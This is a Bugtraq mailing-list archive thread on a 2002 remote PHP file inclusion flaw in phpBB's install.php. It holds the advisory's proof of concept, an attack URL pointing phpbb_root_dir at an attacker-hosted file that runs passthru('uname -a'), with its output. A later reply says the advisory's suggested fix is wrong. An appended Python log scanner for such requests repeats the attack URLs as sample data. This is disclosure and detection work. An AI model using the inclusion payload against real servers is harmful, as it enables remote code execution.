Bugtraq mailing list archives

Re: malicious PHP source injection in phpBB


From: Jonathan Haase <jlhaase () iland net>
Date: Mon, 17 Jun 2002 16:20:21 -0500

Note... The suggested fix for this in the php code below is very 
incorrect and will in fact leave install.php even more wide open 
than it currently is...

The correct fix to the php code should be to change the line on 
or about line 28 which reads...
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);

to read more properly

include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

Thanks,

Jonathan L. Haase


On Sunday 16 June 2002 8:29 am, morris Chang wrote:
JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of the popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in
php.ini, phpBB is vulnerable because install.php contains
dangerous code, so an attacker can include any file into the
server's PHP code.

Impact

It was tested on phpBB 2.0.1, but I think all of phpBB 2 is
affected.

Workaround

Set allow_url_fopen = off and register_globals = off,
and if the install is complete, remove or rename install.php.
Or, in install.php, replace
-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------
with
-------snip-----------------
$phpbb_root_dir='./';
----------------------------

It is also a good idea to add this code: <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1 Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with
"http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and
made a sample file, functions_selects.php:

--------------------includes/functions_selects.php------------
<? passthru("uname -a"); ?>
-----------------------------------------

and typed the following URL to invoke this sample code.

TEST URL :
http://URL/install.php?phpbb_root_dir=http://MYBOX/

-------output----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686
unknown Warning: Cannot add header information - headers
already sent by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 182

Warning: Cannot add header information - headers already sent
by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 183

Warning: Cannot add header information - headers already sent
by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/install.php on line 346
-----------------------------------------

Thanks to BlackKnight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris () xsdeny net
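As an added example for defenders (not part of either message above), the following script scans web server access logs for the request shape the advisory describes: a phpBB path-prefix parameter (phpbb_root_path or phpbb_root_dir) being supplied by the client with a URL or a directory-climbing value. The log lines, IP addresses and ports in it are constructed; the parameter names come from the thread.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample Apache combined-log lines (not taken from the advisory).
# The first two mirror the shape of the advisory's test URL; the rest are benign.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jun/2002:10:01:02 -0500] "GET /phpBB2/install.php?phpbb_root_dir=http://203.0.113.5:6969/ HTTP/1.0" 200 512
192.0.2.11 - - [17/Jun/2002:10:01:09 -0500] "GET /phpBB2/install.php?phpbb_root_path=ftp://203.0.113.5/x/ HTTP/1.0" 200 512
192.0.2.12 - - [17/Jun/2002:10:02:00 -0500] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 8192
192.0.2.13 - - [17/Jun/2002:10:02:30 -0500] "GET /phpBB2/index.php?redirect=http://example.org/ HTTP/1.1" 302 0
"""

# Parameters phpBB uses as a path prefix before include(); a client-supplied
# value that is a URL or climbs directories is only useful to an attacker.
PATH_PARAMS = {"phpbb_root_path", "phpbb_root_dir"}
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def classify_request(target):
    """Return (param, value) for a suspicious path-prefix parameter, else None."""
    query = urlparse(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in PATH_PARAMS:
            continue
        for value in values:
            if URL_SCHEME.match(value) or ".." in value:
                return name, value
    return None

def find_rfi_attempts(log_text):
    """Scan log lines; return (client ip, timestamp, param, value) per hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable combined-log line
        found = classify_request(m.group("target"))
        if found:
            hits.append((m.group("ip"), m.group("ts"), found[0], found[1]))
    return hits

if __name__ == "__main__":
    for ip, ts, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} supplied {param}={value}")
```

A hit on a server where install.php still exists is the signal to remove or rename it, as the advisory recommends; the benign redirect parameter on the last sample line is deliberately not flagged, since only the include path-prefix parameters matter here.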

